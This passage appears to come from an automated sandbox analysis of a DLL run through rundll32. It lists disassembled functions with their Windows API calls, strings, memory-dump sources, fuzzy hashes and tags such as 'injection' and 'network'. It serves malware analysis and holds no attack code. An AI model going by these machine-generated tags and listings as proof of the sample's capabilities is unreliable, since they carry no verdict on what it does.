                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                      • API String ID: 667068680-68207542
                                                                                                                      • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                      • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 656273425-0
                                                                                                                      • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                      • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetParent.USER32(?), ref: 1001AA75
                                                                                                                      • SendMessageA.USER32 ref: 1001AA98
                                                                                                                      • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                      • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 808654186-3887548279
                                                                                                                      • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                      • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 100161DE
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                      • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                      • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3191170017-0
                                                                                                                      • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                      • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                      • API String ID: 667068680-3617302793
                                                                                                                      • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                      • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                      • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                      • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                      • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                      • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                      • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                        • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1509511306-0
                                                                                                                      • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                      • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                      • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                        • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                        • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                      • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                      • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                      • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                        • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                      • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                      • String ID: AfxOldWndProc423
                                                                                                                      • API String ID: 2702501687-1060338832
                                                                                                                      • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                      • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                      • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                      • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                      • _printf.LIBCMT ref: 10012F79
                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                      • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                      • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                      • API String ID: 4222005279-2156106531
                                                                                                                      • Opcode ID: d6930e6a1fc45b4748102b9b6de5cc36bf5b45ad8e48198316e22918239c4344
                                                                                                                      • Instruction ID: 5c8f7e15fc6d9e06ebf4fa262ac9747ef485c43692dc612ad86c8b01a400670e
                                                                                                                      • Opcode Fuzzy Hash: d6930e6a1fc45b4748102b9b6de5cc36bf5b45ad8e48198316e22918239c4344
                                                                                                                      • Instruction Fuzzy Hash: B6317374A85218DBE724DB90CD56FD9B3B1EF49300F1041E8E509AA2C1DB72E9D18F55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                      • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                      • __lock.LIBCMT ref: 10035229
                                                                                                                      • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                      • API String ID: 1036688887-2843748187
                                                                                                                      • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                      • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                      • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                      • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                      • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                      • String ID: MS Shell Dlg
                                                                                                                      • API String ID: 1736106359-76309092
                                                                                                                      • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                      • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                      • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                      • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                      • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 46613423-3470857405
                                                                                                                      • Opcode ID: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction ID: 42bba0fd7f26ad83684da700c29fa1b9b4104b8155991441c2ce65153df76cb7
                                                                                                                      • Opcode Fuzzy Hash: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction Fuzzy Hash: A5119175640268EBEB10DBA0DE85FEF77B8EF1A781F800025FA05E6181EB709D05CB65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                      • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1891723912-0
                                                                                                                      • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                      • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
